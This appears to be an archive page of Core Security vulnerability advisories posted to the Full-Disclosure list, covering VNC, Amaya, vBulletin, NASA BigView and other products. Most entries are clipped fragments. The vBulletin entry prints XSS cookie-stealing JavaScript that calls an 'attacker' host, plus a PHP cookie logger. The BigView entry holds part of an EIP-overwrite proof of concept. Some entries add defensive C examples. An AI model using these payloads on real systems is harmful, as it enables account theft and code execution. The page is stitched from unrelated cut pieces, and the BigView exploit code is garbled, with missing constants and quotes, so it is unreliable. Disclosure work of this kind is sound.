This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJ7hRxyNibggitWa0RAol4AKCOjfL+KHTrwpUC6oW8QCtpj15b5QCgrajW
Naq8DYWEmQtTtrsAx/DeO1U=
=3bt/
-----END PGP SIGNATURE-----



[Full-disclosure] CORE-2009-0108: Multiple vulnerabilities in Sun Calendar Express Web Server

2009-03-31 Thread CORE Security Technologies Advisories
] HTML Code Injection and Cross-Site Scripting
http://www.technicalinfo.net/papers/CSS.html.
[3] The Cross-Site Scripting FAQ (XSS)
http://www.cgisecurity.com/articles/xss-faq.shtml
[4] How to prevent Cross-Site Scripting Security Issues
http://support.microsoft.com/default.aspx?scid=KB;en-us;q252985
[5] How to review ASP Code for CSSI Vulnerability
http://support.microsoft.com/default.aspx?scid=kb;EN-US;253119
[6] How to review Visual InterDev Generated Code for CSSI Vulnerability
http://support.microsoft.com/default.aspx?scid=kb;EN-US;253120


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAknSdqcACgkQyNibggitWa0uJACdGnW7RfFSY8hVoOPaG8mQcF4b
r4IAn15Z4MCrAj2uO9XKLYXBUuYHWNTv
=xGtf
-----END PGP SIGNATURE-----



[Full-disclosure] CORE-2009-0122: HP OpenView Buffer Overflows

2009-03-23 Thread CORE Security Technologies Advisories
 confirms March 23 as the new publication date.
. 2009-03-23: Vendor publishes the hot fix.
. 2009-03-23: Core publishes advisory CORE-2009-0122.


9. *References*

[1] Secunia Research 07/01/2009
http://secunia.com/secunia_research/2008-13/
[2] HP OpenView Network Node Manager Toolbar.exe CGI buffer overflow
http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_toolbar
[3] CVE-2008-0067
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067
[4] HP advisory (HPSBMA02400 SSRT080144)
https://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01646081
[5] HP security bulletin
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01696729


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAknHys0ACgkQyNibggitWa1uoACfWfSGTJjQCfGhYOxwBVbUTAEo
SuAAnAqFoSVhM7q6IcRdqyw6e8LgSFzM
=DVLu
-----END PGP SIGNATURE-----



[Full-disclosure] Foxit Reader Multiple Vulnerabilities (CORE-2009-0218)

2009-03-09 Thread Core Security Technologies Advisories

14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJtXCwyNibggitWa0RAu8GAJ45qFT1lQnIKHD7TZEKcvKkSWtRegCfRHun
pTg5BtPWfDaeHh/o0Jc//Cw=
=M175
-----END PGP SIGNATURE-----



[Full-disclosure] CORE-2008-1009 - VNC Multiple Integer Overflows

2009-02-03 Thread CORE Security Technologies Advisories
 functions:

   . In the case of UltraVNC, in 'ClientConnection::Authenticate()'
   . In the case of TightVNC, in 'ClientConnection::ReadFailureReason()'

To trigger the bug in the function 'ClientConnection::CheckBufferSize'
located in the file 'ClientConnection.cpp' (both vendors):

/---

(vncClient.cpp)

1848: void vncClient::UpdateClipText(LPSTR text)
1849: {
..
..
1858:   rfbServerCutTextMsg message;
1860:   message.length = Swap32IfLE(strlen(text));
1861:   if (!SendRFBMsg(rfbServerCutText, (BYTE *) &message, sizeof(message)))
1862:   {
1863:   Kill();
1864:   return;
1865:   }
1866:   if (!m_socket->SendQueued(text, strlen(text)))
1867:   {
1868:   Kill();
1869:   return;
1870:   }
1871: }
..

---/

In line 1860, the 'message.length' field must be set to some evil value
like 0x.
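The following C program is an added illustration and is not TightVNC or
UltraVNC code. It builds an RFB ServerCutText message the way a malicious
server would (type byte 3, three bytes of padding, a big-endian 32-bit
length, then the text), shows how a 32-bit "length + 1" buffer-size
computation wraps to zero when the server claims a length of 0xffffffff,
and parses the same message with a check that rejects the claimed length
before any arithmetic or allocation happens. The 1 MiB policy cap
(MAX_CUT_TEXT), the function names and the message bodies are assumptions
chosen for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define RFB_SERVER_CUT_TEXT 3u           /* RFB server->client message type */
#define RFB_CUT_TEXT_HDR    8u           /* type(1) pad(3) length(4)        */
#define MAX_CUT_TEXT        (1u << 20)   /* assumed policy cap: 1 MiB        */

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Size a naive client would request for the text buffer: the
 * server-supplied length plus one for a terminator.  The addition is
 * done in 32 bits, so a length of 0xffffffff wraps to 0; the client
 * would then allocate a tiny buffer and copy 'length' bytes into it. */
uint32_t naive_buffer_size(uint32_t length)
{
    return length + 1u;
}

/* Hardened parse: validate the length against a fixed policy cap and
 * against the bytes actually received before doing any arithmetic.
 * Returns 0 and fills *out/*outlen on success, negative on rejection. */
int parse_server_cut_text(const uint8_t *msg, size_t msglen,
                          char **out, size_t *outlen)
{
    if (msglen < RFB_CUT_TEXT_HDR || msg[0] != RFB_SERVER_CUT_TEXT)
        return -1;
    uint32_t length = be32(msg + 4);
    if (length > MAX_CUT_TEXT)
        return -2;                           /* hostile or absurd length  */
    if ((size_t)length > msglen - RFB_CUT_TEXT_HDR)
        return -3;                           /* body shorter than claimed */
    char *buf = malloc((size_t)length + 1);  /* cannot wrap: <= 1 MiB + 1 */
    if (!buf)
        return -4;
    memcpy(buf, msg + RFB_CUT_TEXT_HDR, length);
    buf[length] = '\0';
    *out = buf;
    *outlen = length;
    return 0;
}

/* Constructed test message: a header carrying an arbitrary claimed
 * length followed by whatever body the caller supplies.  The claimed
 * length and the body may disagree, as they would from a malicious
 * server.  Returns the number of bytes written, 0 if 'out' is too small. */
size_t build_server_cut_text(uint8_t *out, size_t cap, uint32_t claimed_len,
                             const char *body, size_t bodylen)
{
    if (cap < RFB_CUT_TEXT_HDR + bodylen)
        return 0;
    out[0] = RFB_SERVER_CUT_TEXT;
    out[1] = out[2] = out[3] = 0;
    out[4] = (uint8_t)(claimed_len >> 24);
    out[5] = (uint8_t)(claimed_len >> 16);
    out[6] = (uint8_t)(claimed_len >> 8);
    out[7] = (uint8_t)claimed_len;
    memcpy(out + RFB_CUT_TEXT_HDR, body, bodylen);
    return RFB_CUT_TEXT_HDR + bodylen;
}

int main(void)
{
    uint8_t msg[64];
    char *text;
    size_t n;

    /* Benign message: claimed length matches the body. */
    size_t len = build_server_cut_text(msg, sizeof msg, 5, "hello", 5);
    int rc = parse_server_cut_text(msg, len, &text, &n);
    printf("benign: rc=%d text=%s\n", rc, rc == 0 ? text : "(none)");
    if (rc == 0)
        free(text);

    /* Malicious message: length 0xffffffff with a 5-byte body. */
    len = build_server_cut_text(msg, sizeof msg, 0xffffffffu, "hello", 5);
    printf("naive size for 0xffffffff: %u\n",
           (unsigned)naive_buffer_size(0xffffffffu));
    printf("hardened: rc=%d\n", parse_server_cut_text(msg, len, &text, &n));
    return 0;
}
```

The check order matters: comparing the raw length against a cap that is
far below the wrap point means the later "+ 1" is provably safe, and
comparing it against the bytes actually received catches a server that
claims more than it sends.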


9. *Report Timeline*

. 2009-01-09:
Core notifies the TightVNC team of the vulnerability.

. 2009-01-09:
Core notifies the UltraVNC team of the vulnerability.

. 2009-01-10:
The UltraVNC team asks Core for a technical description of the
vulnerability.

. 2009-01-12:
Core notifies the TightVNC team of the vulnerability. The previous email
sent by Core was rejected by the vendor email service.

. 2009-01-12:
Technical details sent to UltraVNC team by Core.

. 2009-01-14:
The TightVNC team asks Core for a technical description of the
vulnerability.

. 2009-01-14:
Technical details sent to TightVNC team by Core.

. 2009-01-21:
TightVNC team notifies Core that a fix has been produced, but the
release of the fixed version (TightVNC 1.3.10) will be available early
February. TightVNC team releases the fix for its SVN users [5].

. 2009-01-26:
Core asks TightVNC if the fixed version will be available on
02-Feb-2009. No reply received.

. 2009-01-26:
Core asks UltraVNC team if a fixed version is available.

. 2009-01-26:
UltraVNC team notifies Core that a fixed version will probably be
available on Feb 1st 2009.

. 2009-01-30:
Core notifies TightVNC and UltraVNC teams the advisory will be released
on Feb 3rd 2009, given that the vulnerability was already made public [5].

. 2009-02-02:
UltraVNC team notifies Core that a fix has been produced and will be
available to the users on Tuesday, Feb 3rd.

. 2009-02-02:
TightVNC team notifies Core that a patched version will be available to
the users on Tuesday, Feb 10th.

. 2009-02-03:
CORE-2008-1009 advisory is published.


10. *References*

[1] http://www.uvnc.com.
[2] http://www.tightvnc.com.
[3] http://www.realvnc.com.
[4] UltraVNC binary patches:
http://support1.uvnc.com/download/vncviewer_1054_w32.zip and
http://support1.uvnc.com/download/vncviewer_1054_X64.zip.
[5]
http://vnc-tight.svn.sourceforge.net/viewvc/vnc-tight?view=rev&revision=3564.



14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJiKUCyNibggitWa0RAvpmAJ0ckztpZ9PyAmA

[Full-disclosure] CORE-2008-1211: Amaya web editor XML and HTML parser vulnerabilities

2009-01-28 Thread Core Security Technologies Advisories
);


---/

This is not an exhaustive enumeration of the stack-based buffer
overflows that can be found in Amaya. Remarkably, in the unpatched
version, files 'html2thot.c' and 'xml2thot.c' contain many general
purpose buffers defined as

/---

char msgBuffer[MaxMsgLength]
---/

and the length of these buffers is generally not checked in the functions
that write into them (e.g. 'strcpy', 'sprintf', etcetera).
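As an added example (not Amaya code), here is the pattern just described
beside a bounded replacement: an unchecked sprintf into a fixed
'msgBuffer[MaxMsgLength]' writes as many bytes as the input dictates, so
an element name longer than the buffer overruns the stack, while snprintf
caps the write and reports truncation so the caller can treat it as an
error. The value of MaxMsgLength, the message text and the function names
are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>

#define MaxMsgLength 200   /* assumed value; the advisory names only the macro */

/* Bytes (excluding the NUL) an unchecked sprintf of this diagnostic
 * would write into msgBuffer.  Anything >= MaxMsgLength is a stack
 * overflow in the unchecked pattern; we compute it rather than perform
 * it so the program stays well defined. */
size_t unchecked_message_length(const char *element)
{
    return strlen("Unknown element: ") + strlen(element);
}

/* Hardened replacement: the write is bounded by the buffer size and
 * truncation is reported instead of ignored.  Returns 0 on success,
 * -1 if the message did not fit (the buffer is still NUL-terminated). */
int format_message(char *msgBuffer, size_t bufsize, const char *element)
{
    int n = snprintf(msgBuffer, bufsize, "Unknown element: %s", element);
    if (n < 0 || (size_t)n >= bufsize)
        return -1;
    return 0;
}

int main(void)
{
    char msgBuffer[MaxMsgLength];
    char longname[1024];                  /* constructed oversized element name */
    memset(longname, 'A', sizeof longname - 1);
    longname[sizeof longname - 1] = '\0';

    printf("unchecked sprintf would write %zu bytes into a %d-byte buffer\n",
           unchecked_message_length(longname), MaxMsgLength);
    printf("bounded, long name: rc=%d\n",
           format_message(msgBuffer, sizeof msgBuffer, longname));
    printf("bounded, short name: rc=%d (%s)\n",
           format_message(msgBuffer, sizeof msgBuffer, "p"), msgBuffer);
    return 0;
}
```

Reporting truncation is the important half: a parser that silently keeps
a clipped diagnostic is safe from the overflow but may still log or act
on a mangled name, so the caller should check the return value.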


9. *Report Timeline*

. 2008-12-18: Core notifies the vendor of the vulnerability.
. 2008-12-19: Vendor requests information about versions tested.
. 2008-12-19: Core notifies the vendor that the vulnerability was tested
on Amaya 11.0 and 10.0 (Windows XP).
. 2008-12-29: Core offers to send the advisory draft to the vendor and
offers to negotiate the publication date.
. 2009-01-08: Core sends the advisory draft to the vendor.
. 2009-01-09: Vendor informs that the bugs were fixed in the CVS version
and will be included in version 11.1 by the end of January.
. 2009-01-12: Core requests a more precise date.
. 2009-01-14: Vendor suggest to publish the advisory on January 28th at
the same time of release of Amaya 11.1.
. 2009-01-14: Core confirms the vendor that advisory CORE-2008-1211 will
be published on January 28th.
. 2009-01-28: Core publishes advisory CORE-2008-1211.


10. *References*

[1] Amaya Homepage http://www.w3.org/Amaya


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJgKLpyNibggitWa0RAmNOAKCT1Mxhe8VysinqBnwAtbuuhAaedgCeOWL6
DWuJPZIBvcK5lINLAJ2ylR8=
=X9Dw
-----END PGP SIGNATURE-----



[Full-disclosure] CORE-2008-1128: Openfire multiple vulnerabilities

2009-01-08 Thread CORE Security Technologies Advisories

14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAklmORMACgkQyNibggitWa35jgCbByp8LF4bUePcXG2YK1KEiV9G
GYcAn3kpUOvc0f8N1TbJJufmRTCkgqxI
=xHTF
-----END PGP SIGNATURE-----



[Full-disclosure] CORE-2008-1210: Qemu and KVM VNC server remote DoS

2008-12-22 Thread CORE Security Technologies Advisories

11. *Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


12. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.


[Full-disclosure] CORE-2008-0228: Microsoft Word Malformed FIB Arbitrary Free Vulnerability

2008-12-10 Thread CORE Security Technologies Advisories


[Full-disclosure] CORE-2008-1127 - Vinagre show_error() format string vulnerability

2008-12-09 Thread CORE Security Technologies Advisories


[Full-disclosure] CORE-2008-0526: Adobe Reader Javascript Printf Buffer Overflow

2008-11-04 Thread CORE Security Technologies Advisories


[Full-disclosure] CORE-2008-0126: iPhone Safari JavaScript alert Denial of Service

2008-09-12 Thread Core Security Technologies Advisories


[Full-disclosure] CORE-2008-0813 - vBulletin Cross Site Scripting Vulnerability

2008-08-20 Thread CORE Security Technologies Advisories
// == XSS - Cookie stealing - vBulletin 3.7.2 PL1 ==
//
// Using the first method described in
// http://www.securityfocus.com/archive/107/308433
//
// To bypass HttpOnly cookie restrictions - Works in IE 6 and lower

var XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
XmlHttp.open("GET", "http://victim/vbStealer/logger.php", false);
XmlHttp.setRequestHeader("Host", "attacker");
XmlHttp.send();

---/

and the 'logger.php' script file:

/---

<?php
// == XSS - Cookie stealing - vBulletin 3.7.2 PL1 ==

$all_cookies = "";
foreach ($_COOKIE as $cookie_name => $cookie_value) {
    $all_cookies .= "$cookie_name=$cookie_value, ";
}
// rtrim() returns the trimmed string; it must be assigned back or the
// trailing ", " is kept
$all_cookies = rtrim($all_cookies, ", ");
file_put_contents("iplog.txt", "COOKIES: " . $all_cookies . "\n", FILE_APPEND);
?>

---/


*Report Timeline*

. 2008-08-14: Core Security Technologies notifies the vBulletin team of
the vulnerability.
. 2008-08-14: The vBulletin team asks Core for a technical description
of the vulnerability.
. 2008-08-14: Technical details sent to vBulletin team by Core.
. 2008-08-15: vBulletin notifies Core that a fix has been produced and
will be available to the users on Monday, August 18th.
. 2008-08-18: vBulletin releases patches for this flaw to its customers.
. 2008-08-20: The advisory CORE-2008-0813 is published.




[Full-disclosure] CORE-2008-0103: Internet Explorer Zone Elevation Restrictions Bypass and Security Zone Restrictions Bypass

2008-08-14 Thread CORE Security Technologies Advisories


[Full-disclosure] CORE-2008-0716 - Sun xVM VirtualBox Privilege Escalation Vulnerability

2008-08-05 Thread CORE Security Technologies Advisories


[Full-disclosure] CORE-2008-0125: CitectSCADA ODBC service vulnerability

2008-06-11 Thread CORE Security Technologies Advisories


[Full-disclosure] CORE-2008-0425 - NASA BigView Stack Buffer Overflow

2008-06-04 Thread CORE Security Technologies Advisories
::ppmHeader()
doesn't return immediately, and we must modify internal variables to
cause an overwrite of a C++ string destructor executed at the end of the
function to gain control of EIP
# PS.: Congrats for the Phoenix mars Lander!
for i in range(7):
w.write(chr(i)*4)
w.write(AA)
w.write(struct.pack(L,0x))
w.write(struct.pack(L,0x))
w.write(struct.pack(L,0x))
w.write(struct.pack(L,0x0808))
w.write(struct.pack(L,0x0808)*48)

#The address of the destructor is hard-coded. Sorry but this is only a PoC!
destination = 0x0805b294 # destructor
value = 0x41414141 #address to jump to
w.write(struct.pack(L,destination)) # destination

w.write(
%d 300
255
255
255
255
 % value)
w.close()

---/


*Report Timeline*

. 2008-04-24:
Initial contact email sent by Core to BigView team setting the estimated
publication date of the advisory to May 19th.

. 2008-04-28:
Vendor acknowledges the email notification.

. 2008-04-30:
Core sends the advisory draft to BigView support team. No reply received.

. 2008-05-12:
New email sent to BigView asking for a response. No reply received.

. 2008-05-15:
New email sent to BigView asking for a response.

. 2008-05-15:
BigView support team informs us that a new patched version is ready, but
is not yet available via the BigView webpage.

. 2008-05-19:
Core does not release the advisory (as planned).

. 2008-05-19:
New email sent to BigView team asking if the fixed version is available
to the users.

. 2008-05-26:
New email sent to BigView team, recapping the communications that took
place, and asking for an answer.

. 2008-06-02:
Vendor responds that a tarball with fixes has been published on
BigView's website.

. 2008-06-03:
Core sends the final version of the advisory to the BigView team.

. 2008-06-04:
CORE-2008-0425 advisory is published.




[Full-disclosure] CORE-2008-0126: Multiple vulnerabilities in iCal

2008-05-21 Thread Core Security Technologies Advisories


[Full-disclosure] CORE-2008-0129 - Wonderware SuiteLink Denial of Service vulnerability

2008-05-06 Thread CORE Security Technologies Advisories


[Full-disclosure] CORE-2008-0326: NASA's Common Data Format buffer overflow

2008-05-05 Thread Core Security Technologies Advisories


[Full-disclosure] CORE-2008-0320 - Insufficient argument validation of hooked SSDT functions on multiple Antivirus and Firewalls

2008-04-28 Thread CORE Security Technologies Advisories
 for all of Sophos
Windows customers. Sophos would like to fix the bug in the next major
version (second quarter 2009), in particular considering the fact that
they were unable to come up with any practical use of this vulnerability.
. 2008-04-14: Comodo notifies Core that a fix has been produced.
. 2008-04-14: Sophos informs Core that they will be able to release a
fix to the vulnerability at the end of October 2008.
. 2008-04-21: Core responds that they will reschedule the publication to
April 24th, 2008. Since the vulnerability is not critical, and has been
found using publicly available tools, like the other vulnerabilities
included in the advisory, Core doesn't see a reason to postpone the
publication of the Sophos bug until October 2008.
. 2008-04-21: Sophos asks Core not to release details of the
vulnerability until a fix is available, and not to publish Proof of
Concept code. Sophos informs that they do not believe that arbitrary
code execution is possible.
. 2008-04-24: Core responds that the advisory does not contain Proof of
Concept code. Core confirms its intention of publishing the advisory,
including the technical description, but decides to postpone it to April
28th, to give the participants more time to coordinate the release of
public information.
. 2008-04-25: Sophos provides additional information, included in the
vendor information section of the advisory.
. 2008-04-28: CORE-2008-0320 advisory is published.


*References*

[1] http://www.bitdefender.com
[2] http://www.comodo.com
[3] http://www.sophos.com
[4] http://www.rising-global.com
[5] http://www.matousec.com/downloads
[6]
http://www.matousec.com/info/articles/plague-in-security-software-drivers.php


*About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/.


*About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


*Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


*GPG/PGP Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFIFj4WyNibggitWa0RAkUcAJ9yUGXQQV5ZQ1J0R2U+MSTMRuHa4wCgkXh1
UGe5qGGTXrCSFfFX3JH6ovE=
=3mt3
-----END PGP SIGNATURE-----

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CORE-2008-0314 - Orbit Downloader Download failed buffer overflow

2008-04-03 Thread CORE Security Technologies Advisories
 notifies Core Security Technologies that a fix has
been produced.
. 2008-04-03: CORE-2008-0314 advisory is published.


*References*

[1] http://www.orbitdownloader.com
[2] http://msdn2.microsoft.com/en-us/library/ms776413(VS.85).aspx


*GPG/PGP Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFH9UkByNibggitWa0RAuXFAJ4v5Fgp5RNTdK/7uOpzenSArY4jUQCeKV4D
4aeviH5oHhjdIRFmDLVVUx0=
=v9yp
-----END PGP SIGNATURE-----
